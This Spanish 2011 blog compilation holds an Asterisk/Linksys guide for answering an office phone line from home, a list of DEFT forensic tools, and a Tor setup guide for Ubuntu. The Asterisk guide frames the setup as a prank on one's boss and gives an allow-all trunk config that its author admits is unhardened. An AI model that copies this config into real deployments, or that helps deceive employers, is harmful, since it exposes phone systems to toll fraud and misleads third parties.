El dispositivo ATA a utilizar es un Cisco Linksys SPA3102. Este simpático cacharro cuenta con un conector FXO o POTS o, para que me entendáis, un conector de teléfono RJ-11 como el que enchufáis desde la roseta a un teléfono normal. Además cuenta con otro conector RJ-11 llamado FXS en el que se podría enchufar un teléfono convencional. Por otra parte, tiene dos conectores Ethernet RJ-45, que permiten separar dos redes, la que conecta a Internet de la que conecta a los dispositivos de telefonía IP. En mi caso, lo he configurado en modo bridge, de manera que ambos interfaces de red llevan a la misma red. Además he conectado el conector FXO a la roseta del teléfono. De esta manera, unimos el mundo del cable de teléfono con nuestra red, como si fuera un router ADSL, pero para hacer y contestar llamadas.




Lo siguiente que hemos de configurar es una centralita de telefonía IP con Asterisk. En el caso de poder engañar al jefe diciendo que estamos en la oficina, necesitaremos un acceso VPN ya establecido. Situaremos la centralita, o en la propia red de la oficina o en la de casa, pero el Linksys y el Asterisk tienen que tener conectividad. En este ejemplo vamos a suponer que tanto Linksys como Asterisk están en la misma red.

En el dispositivo Linksys SPA3102, configuramos lo siguiente:

En Voice -> PSTN Line:
  • En Proxy and Registration -> Proxy, indicamos la dirección IP de la centralita VoIP, donde enviaremos las llamadas que nos lleguen por la línea de teléfono convencional.
  • En Register decimos "YES", y en "Make Call without Reg" y "Ans call without reg" decimos "NO" -> Así hacemos que el Linksys tenga que registrarse en la centralita como dispositivo, antes de poder enviar o recibir llamadas.
  • En Subscriber Information, configuramos UserID con el valor "SPA", en Password asignamos "LaPassSPA"
  • En Dialplans, escribimos "(S0<:s>)" en el número 2.
  • En "VoIP-To-PSTN Gateway Enable" decimos "yes"
  • En "PSTN-To-VoIP Gateway Enable" y en "PSTN CID to VoIP CID" decimos "Yes". En "PSTN Caller Default DP" decimos el "2" -> Esto es el Dial Plan, que antes hemos personalizado para el número 2.
  • En "FXO timer values", en "VoIP Answer Delay" ponemos "1" y en "PSTN Answer Delay" ponemos 10. Esto es, cuántos segundos queremos esperar en cada sentido. En el caso de PSTN answer Delay es, desde que empieza a sonar el teléfono, cuánto rato tarda el Linsys en "contestar" y enviarle las llamadas a la centralita. El VoIP answer delay es el tiempo de espera en el otro sentido.
En Voice -> Line1:   
  • En Proxy and Registration -> Proxy, indicamos la dirección IP de la centralita IP, donde enviaremos las llamadas que nos lleguen por la línea de teléfono convencional.
  • En Register decimos "YES", y en Make Call without Reg y Ans call without reg decimos "NO" -> Así hacemos que el Linksys tenga que registrarse en la centralita como dispositivo antes de poder enviar o recibir llamadas.
  • En Subscriber Information, configuramos UserID con el valor "SPA", en Password asignamos "LaPassSPA"

Con estos pasos tendremos el Linksys listo para enrrutar las llamadas entrantes y salientes entre Asterisk y la línea telefónica.

Para la instalación de Asterisk, he utilizado AsteriskNOW, una distribución creada por Digium (los creadores de Asterisk) basada en CentOS Linux 5, que instala el software de la centralita, así como FreePBX, una GUI web para su configuración, con aquello que necesitamos. La distribución es francamente sencilla de instalar, aunque si no conoces Asterisk, no es tan fácil de parametrizar. Así que os quiero contar los pasos que hay que hacer para que lo veáis más claro:
  • En FreePBX, lo primero es crear una extensión para el usuario a conectarse (nosotros desde el sofá de casa). En Setup -> Basic -> Extension -> Generic SIP Device, y creamos una nueva extensión de tipo SIP. Importante indicar una contraseña con letras y números, en Host indicamos que es dynamic (que se puede conectar desde cualquier IP), y ponemos que es de tipo "peer" o "friend".
  • En Setup -> Basic -> Trunks (o Líneas si lo tenemos en español) añadimos un nuevo Trunk. Seleccionamos que es de tipo SIP también. En reglas de marcación añadimos "XXXXXXXXX" -> 9 Xs seguidas que indican 9 dígitos del 0 al 9, para que acepte todas las llamadas con ese formato. En el campo nombre del Trunk indicamos "SPA"  (que es lo mismo que pusimos en el Linksys para el valor UserID) y en detalles del Peer (o del par, en español) indicamos lo siguiente:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
disallow=all
allow=ulaw
canreinvite=no
context=from-trunk
dtmfmode=rfc2833
host=dynamic
incominglimit=1
nat=never
port=5061
qualify=yes
secret=LaPassSPA
permit=0.0.0.0/0.0.0.0
type=friend
username=SPA
faxdetect=yes

Ahora, añadimos la ruta saliente por defecto. Para ello en Setup-> Basic-> Outbound Routes, yo he editado la ruta que viene como 9_Outside y la he dejado como se puede ver en la imagen siguiente:


Así indicamos a Asterisk que cuando detecte un patrón "XXXXXXXXX" o "0|XXXXXXXXX" (es decir 9 dígitos del 0 al 9 o 0 + 9 dígitos del 0 al 9), quita el 0 del principio y le pasa la llamada al Trunk SPA que hemos definido. Es decir, le dice: Marca este número por tu interfaz RJ-11 telefónico.

Lo siguiente a crear es la ruta entrante por defecto. Si queremos que según entra la llamada, nos suene en nuestra extensión, "estemos donde estemos" ;) tendremos que ir a Setup -> Basic -> Inbound Routes y crear una ruta nueva. Hay que indicar en Set Destination la extensión que hemos creado inicialmente.


IMPORTANTE: Esto son cambios hechos en los ficheros, pero no aplicados aún, por lo que hay que pinchar arriba en "Apply Configuration Changes" y podremos probar si funciona o no lo que hemos configurado.

Una vez configurada la centralita para recibir el tráfico entrante y permitir el saliente a través del Linksys, tendremos que comprobar si la SPA se "registra" correctamente en Asterisk. Pensad en que la SPA3102 es un dispositivo SIP más, que se conecta como si fuera una extensión, aunque sea un Trunk. Para ello, lo más cómodo y potente es hacerlo en modo UNIX-like, es decir, mediante una conexión SSH a AsteriskNOW. Ejecutamos "asterisk -vr" para obtener una conexión al servidor y, una vez dentro, con lo siguiente:


1
2
3
4
5
LawAsterisk*CLI> sip show peers
Name/username              Host            Dyn Nat ACL Port     Status   
SPA/SPA                    192.168.52.26    D       A  5061     OK (10 ms)
3 sip peers [Monitored: 2 online, 1 offline Unmonitored: 0 online, 0 offline]
LawAsterisk*CLI>

Aquí vemos que el Trunk SPA se ha conectado correctamente.

El próximo paso es conectar el cliente soft-phone que queramos a la centralita Asterisk, para poder probar si todo va como corresponde. Sin embargo, recordad que tanto el Linksys como Asterisk están en la red de la oficina y nosotros en casa, por lo que tendremos dos opciones: La MUY insegura, consistente en hacer NAT entrante de la red de la IP del router de la oficina de los puertos UDP 5060 y UDP 5061 hacia la IP interna de la centralita (OJO, que podéis provocar un punto de entrada enorme para un desfalco en la factura telefónica de vuestra empresa. Imaginad por ejemplo una fuerza bruta de extensiones/contraseñas registrándose en la centralita para hacer llamadas gratis desde vuestra línea!); La forma segura, es no publicar hacia Internet este servicio, conectandónos inicialmente a la empresa vía VPN. Una vez "dentro" de la red interna de la oficina, ya podemos configurar el soft-phone con la IP de la centralita, el usuario SIP creado con su contraseña correspondiente y vemos que éste se registra correctamente en la centralita. Como soft-phone, he probado Zoiper para Mac OSX en su versión libre.

Desde la propia consola de Asterisk, veremos que efectivamente ambos dispositivos están conectados a la centralita:

1
2
3
4
5
LawAsterisk*CLI> sip show peers
Name/username              Host            Dyn Nat ACL Port     Status    
101/101                    192.168.52.215   D   N   A  5060     OK (102 ms)    
SPA/SPA                    192.168.52.26    D       A  5061     OK (4 ms) 
3 sip peers [Monitored: 2 online, 1 offline Unmonitored: 0 online, 0 offline]

A partir de ahora, a llamar a los clientes desde casa con el número de la oficina, y si el jefe llama al número fijo para saber si has ido a trabajar, podrás salvar el tipo! 


Conclusiones
  • El coste de mejorar nuestro bienestar, no yendo a trabajar a la oficina cuando el jefe no está, es de unos 60 dólares envío incluido a través de Ebay y unos 70 euros en tiendas online especializadas... En mi caso, gracias a que mi amigo Domingo disponía de un Linksys SPA3102, he podido configurarlo para trastear convenientemente. 
  • Evidentemente, que nadie se piense que esto es infalible para engañar al jefe. Es más la broma que he querido hacer en el post que otra cosa. Tened en cuenta que cuando Asterisk descuelga la llamada, el transferir a la extensión definida, genera un tono completamente diferente al habitual y, a no ser que el jefe sea muy despistado, os pillará ;D
  • En mi caso, he montado este sistema para poder hablar desde casa a través de telefonía IP (de la que aún no tengo dispositivos), y para poder configurar un FAX por software con IAXMODEM, así como con el mejor servidor de FAX para mi gusto: Hylafax. De momento, los Faxes que yo envío llegan  correctamente a su destino. Sin embargo, los fax entrantes, aunque la comunicación se establece correctamente, llega vacío. Tenía entendido que la VoIP y los FAXES no se llevan bien, aunque prometo pegarme con ello.
  • En el ejemplo puesto en el post, no es necesario añadir ningún módulo más que lo que AsteriskNOW ya incorpora. Sin embargo, para un uso más profesional y con una mayor utilidad, os volveréis locos buscando opciones de configuración en FreePBX, si no instaláis los módulos opcionales correspondientes. Interesantes son: IVR, Ring groups, Time Conditions o Announcements, entre otras.   
  • A la hora de configurar Asterisk, de una forma más profesional, hay que cumplir una serie de "buenas prácticas" (que yo no he cumplido al 100%) para evitar, por ejemplo enumeración de usuarios, ataques de fuerza bruta o de diccionario, que puedan derivar, como decíamos anteriormente, en un problema serio en la factura del teléfono, o la suplantación de extensiones, entre otros posibles ataques. Pero eso, lectores, será en otro post! 
Fuente;http://www.securitybydefault.com/2011/11/como-llamar-desde-casa-simulando-que.html

miércoles, 2 de noviembre de 2011

Distribucion Forense DEFT

(Digital Evidence & Forensic Toolkit) es una distribución Live CD (booteable desde el CD) basada en Ubuntu con kernel 2.6.35, muy fácil de usar, con un grandísimo listado de herramientas forenses y con una excelente detección del hardware.
DEFT 1 DEFT (Digital Evidence & Forensic Toolkit)
DEFT es una de las distribuciones de análisis que más han avanzado en estos últimos años (puedes verlo tú mismo desde la entrada que creamos cuando solo estaba en su versión 3), no solo han añadido una gran cantidad de herramientas forenses a su lista, sino que se han sabido adaptarse a su entorno y emular las características de otras distribuciones similares CAINE de donde se han inspirados para sacar el DEFT Extra.
DEFT (Digital Evidence & Forensic Toolkit) está dividida en dos, su entorno y herramientas booteables que recogen lo mejor del software libre para el análisis forense y DEFT Extra un conjunto de herramientas gratuitas para análisis forense en entornos Windows.
En DEFT podemos encontrar las siguientes herramientas para realizar Análisis Forense:
DEFT 3 DEFT (Digital Evidence & Forensic Toolkit)
  • sleuthkit 3.2.0, collection of UNIX-based command line tools that allow you to investigate a computer
  • autopsy 2.24, graphical interface to the command line digital investigation tools in The Sleuth Kit
  • DFF 0.8
  • dhash 2.0.1, multi hash tool
  • aff lib 3.6.4, advanced forensic format
  • disk utility 2.30.1, a partition manager tool
  • guymager 0.5.7, a fast and most user friendly forensic imager
  • dd rescue 1.14, copy data from one file or block device to another
  • dcfldd 1.3.4.1, copy data from one file or block device to another with more functions
  • dc3dd 7, patched version of GNU dd to include a number of features useful for computer forensics
  • Xmount 0.4.4, convert on-the-fly between multiple input and output hard disk image types
  • foremost 1.5.6, console program to recover files based on their headers, footers, and internal data structures
  • photorec 6.11, easy carving tool
  • mount manager 0.2.6, advanced and user friendly mount manager
  • scalpel 1.60, carving tool
  • wipe 0.21
  • hex dump, combined hex and ascii dump of any file
  • outguess 0.2 , a stegano tool
  • ophcrack 3.3.0, Windows password recovery
  • Xplico 0.6.1 DEFT edition, advanced network analyzer
  • Wireshark 1.2.11, network sniffer
  • ettercap 0.7.3, network sniffer
  • nmap 5.21, the best network scanner
  • dmraid, discover software RAID devices
  • testdisk 6.11, tool to recover damaged partitions
  • ghex, light gtk hex editor
  • vinetto 0.6, tool to examine Thumbs.db files
  • trID 2.02 DEFT edition, tool to identify file types from their binary signatures
  • readpst 0.6.41, a tools to read ms-Outlook pst files
  • chkrootkit, Checks for signs of rootkits on the local system
  • rkhunter 1.3.4, rootkit, backdoor, sniffer and exploit scanner
  • john 1.7.2, john the ripper password cracker
  • catfish, file search
  • galletta 1.0
  • pasco 1.0
  • md5sum, sha1sum, sha224sum, sha256sum, sha512sum
  • md5deep, sha1deep, sha256deep
  • skype log view, skype chat conversation viewer
  • Xnview, viewer graphics, picture and photo files
  • IE, Mozilla, Opera and Chrome cache viewer
  • IE, Mozilla, Opera and Chrome history viewer
  • Index.dat file analyzer
  • pdfcrack, cracking tool
  • fcrackzip, cracking tool
  • clam, antivirus 4.15
  • mc, UNIX file manager
Y en el DEFT extra contamos con el siguiente listado de herramientas para análisis de entornos Windows:
DEFT 2 DEFT (Digital Evidence & Forensic Toolkit)
  • WinAudit 2.28.2
  • MiTeC Windows Registry Recovery 1.5.1.0
  • Zeroview 1.0
  • FTK Imager 3
  • Nigilant32 0.1
  • Windows Forensic Toolchest 3.0.05
  • MoonSols Win32dd 1.0.2.20100417
  • MoonSols Win64dd 1.0.2.20100417
  • Windows File Analyzer 1.0
  • UltraSearch 1.40
  • Pre-Search xx.08
  • XnView 1.97.8
  • X-AgentRansackk 2010 (build 762)
  • Index.dat Analyzer 2.5
  • AccessEnum 1.2
  • Autoruns 10.03
  • DiskView 2.4
  • Filemon
  • Process eXPlorer 12.04
  • RAM Map 1.1
  • Regmon
  • Rootkit Revealer 1.71
  • VMMap 2.62
  • WinObj 2.15
  • AlternateStreamView 1.15
  • ChromeCacheView 1.25
  • CurrPorts x86 e x64 1.83
  • CurrProcess 1.13
  • FoldersReport 1.21
  • IE Cache View 1.32
  • IE Cookie View 1.74
  • IE History View 1.50
  • Inside Clipboard 1.11
  • Live Contacts View 1.07
  • Mozilla Cache View 1.30
  • Mozilla History View 1.25
  • MUI Cache View 1.01
  • MyEventView 1.37
  • MyLastSearch 1.44
  • Mozilla Cookie View 1.30
  • Opened File View 1.46
  • Opera Cache View 1.37
  • Outlook Attack View x86 e x64 1.35
  • Process Activity View x86 e x64 1.11
  • Recent File View 1.20
  • Regscanner x86, x64 e win98 1.82
  • ServiWin 1.40
  • SkypeLogView 1.15
  • SmartSniff x86 e x64 1.71
  • StartupRun 1.22
  • USBdeview x86 e x64 1.80
  • User Assist View 1.01
  • User Profile View 1.01
  • Video Cache View 1.78
  • WhatInStartup 1.25
  • WinPerfectView 1.10
  • Password Tool
  • ChromePass 1.10
  • Dialupass 3.10
  • IE PassView 1.20
  • LSA Secrets Dump x86 e x64 1.21
  • LSA Secrets View x86 e x64 1.21
  • Mail PassView 1.65
  • MessenPass 1.35
  • Network PassRecovery x86 e x64 1.30
  • Opera PassView 1.01
  • PasswordFOX 1.25
  • PC AnyPass 1.12
  • Protected Pass View 1.63
  • PST Password 1.12
  • Remote Desktop PassView 1.01
  • VNC PassView 1.02
  • Win9x Passview 1.1
  • WirelessKeyView x86 e x64 1.34
  • AViScreen Portable 3.2.2.0
  • Hoverdesk 0.8
  • File Restore Plus 3.0.1.811
  • WinVNC 3.3.3.2
  • TreeSizeFree 2.40
  • PCTime
  • LTFViewer 5.2
  • Sophos Anti-Rootkit 1.5.4
  • Terminal with tools command line
  • Spartakus 1.0
  • Testdisk 6.11.3
  • Photorec 6.11.3
Al ser un proyecto pensado inicialmente para enseñar análisis forense en la Universidad di Bologna, DEFT esta muy bien documentado, el único problema de esta documentación es que está totalmente en italiano, pero con muchas gráficas y fácilmente entendible (IT – manuale completoIT – manuale senza le appendici)
Como novedad en DEFT 6.1.1 version previa a la 7.0, han añadido una excelente herramienta que nos permite sacar una completa línea de tiempo, parseando los logs del sistema y ordenándolos para una fácil comprensión, esta herramienta se llama log2timeline y promete ahorrarnos mucho tiempo en la creación de nuestra línea de tiempo.

Descargar la última versión de DEFT

Mas Información:
Pagina oficial de DEFT (Digital Evidence & Forensic Toolkit)

Fuente:http://www.dragonjar.org/deft-digital-evidence-forensic-toolkit.xhtml

lunes, 24 de octubre de 2011

Navega de forma anonima y segura con TOR en linux,manual de instalacion

Introducción

Hace ya un tiempo escribí un artículo referente a la privacidad, “Tor, en busca de la privacidad“, para navegar por internet de forma segura. Aquel artículo es de algo mas de un año, con la versión Lucid de Ubuntu. Actualmente ya en Oneiric Ocelot, la cosa ha cambiado ligeramente, se han introducido mejoras considerables a TOR, y se encuentra integrado dentro de los repositorios oficiales de Ubuntu, con lo que su instalación y configuración es realmente sencilla.

TOR

¿Que es TOR?

Tor (The Onion Router) es una red de túneles virtuales que permite a los usuarios mejorar su seguridad y privacidad en el uso de internet. Además permite a los desarrolladores de software crear nuevas herramietnas de comunicación con características integradas de privacidad. Tor facilita las bases para un amplio rango de aplicaciones que permiten a las organizaciones y usuarios compartir información en redes públicas sin comprometer su privacidad.
Tor fué desarrollado originalmente en el US Naval Research Laboratory, y patrocinado hasta noviembre de 2005. Tor facilita un canal de comunicación anómimo, y está diseñado para resisitir ataques de análisis de tráfico. De esta manera cuando te conectas a internet, utilizando Tor, la dirección IP que figura no es exactamente la tuya. De cualquier forma, Tor no es fiable al 100% en referencia al cifrado de la información, ya que su objetivo principal, es asegurar el anonimato del usuario, de forma que no se pueda rastrear la información que envía para llegar hasta él. De esta forma, la comunicación se cifra a la entrada de la red Tor y a la saldida de dicha red, de forma que es imposible conocer quien es el que envío la información. Vamos, al final se trata de verlo como una caja negra, donde tu metes información por un lado, y cuando sale por el otro lado el que la recibe no conoce su origen. De esta manera es muy complicado conocer la identidad del emisor, pero no es tan difícil conocer el contenido del mensaje y su destinatario.

Instalación

Como he comentado, en Oneiric Ocelot, Tor, se encuentra en los repositorios de Ubuntu, con lo que su instalación es sencilla, o bien haces clic en Tor, o bien desde el terminal:
1
sudo apt-get install tor
Además te recomiendo la instalación de Vidalia, que es un indicador, que te ayudará en tus conexiones. Igualmente puedes instalarlo haciendo clic en Vidalia o desde el terminal:
1
sudo apt-get install vidalia
Una vez instalado, puedes iniciar Vidalia desde el Dash, y verás un nuevo indicador, en el área de indicadores
Independientemente de la facilidad de instalarlo desde los repositorios oficiales de Ubuntu, es interesante, y mas que recomendable añadir los repositorios de Tor, para tener todas las últimas actualizaciones de seguridad. Para ello tienes que añadir la siguiente línea a /etc/apt/sources.list:
1
deb http://deb.torproject.org/torproject.org oneiric main
y añadir la clave gpg:
1
2
gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -

Configuración con Firefox

Puedes navegar por la red Tor con Firefox, sin añadir ningún complemento, pero es interesante, tener alguno, que te permita conmutar entre la navegación con Tor y sin él, no es que sea excesivamente complicado, pero es mucho más cómodo. Yo después de probar varios me he decantado por FoxyProxy Basic, que te permite llevar en marcha varias conexiones proxy, y que te mostrará un icono en la barra de complementos, que aparece en la parte inferior de Firefox, indicándote si tienes una conexión proxy habilitada, y en función del color del icono, la conexión en cuestión.
tor
De esta manera para añadir y configurar nuestra conexión proxy a Tor, simplemente tendremos que indicar la dirección 127.0.0.1, y el puerto 8118, que es el que viene configurado por defecto.
tor
Y ya podemos comprobar si nuestra conexión está trabajando correctamente bajo Tor o no, simplemente visitando la siguiente página del proyecto tor. Y en caso de que todo funcione correctamente verás la siguiente página:
tor
De echo, es realmente interesante, porque si te conectas a través de la red Tor, y entras en google, verás que no te aparece la página para España, puesto que realmente no conoce tu procedencia, sino que aparece la de cualquier otro país.
tor

Instalación en Thunderbird

Para continuar con la configuración, solo nos queda el cliente de correo Thunderbird, aunque se pueden configurar mas aplicaciones, yo me voy a quedar aquí. Igual que en el caso de Firefox, no es necesario instalar ningún complemento, pero para nuestra comodidad podemos instalar el mismo que en Firefox, FoxyProxy Basic. Esta es una de las razones por las que me he decantado por este complemento, puesto que la configuración es exactamente la misma para ambos, así como el funcionamiento. Menos calentamiento de cabeza.

Conclusiones

Teniendo en cuenta, que con los ordenadores portátiles, y las redes libres, podemos conectarnos a cualquier página, en cualquier lugar, es interesante, mantener nuestra privacidad lo máximo posible. El precio que pagamos evidentemente es la lentitud de la conexión, pero a cambio, estamos mas seguros, y es mucho mas difícil rastrearnos. Teniendo en cuenta, de lo que estamos hablando, es muy probable, que seamos algo paranoicos, sobre todo si tenemos en cuenta que la mayoría de los usuarios, no alcanzan este nivel de protección, pero nunca se sabe.
Más información | Tor Project, Wikipedia

Fuente:http://www.atareao.es/ubuntu/conociendo-ubuntu/navegacion-segura-con-ubuntu-tor-firefox-y-thunderbird/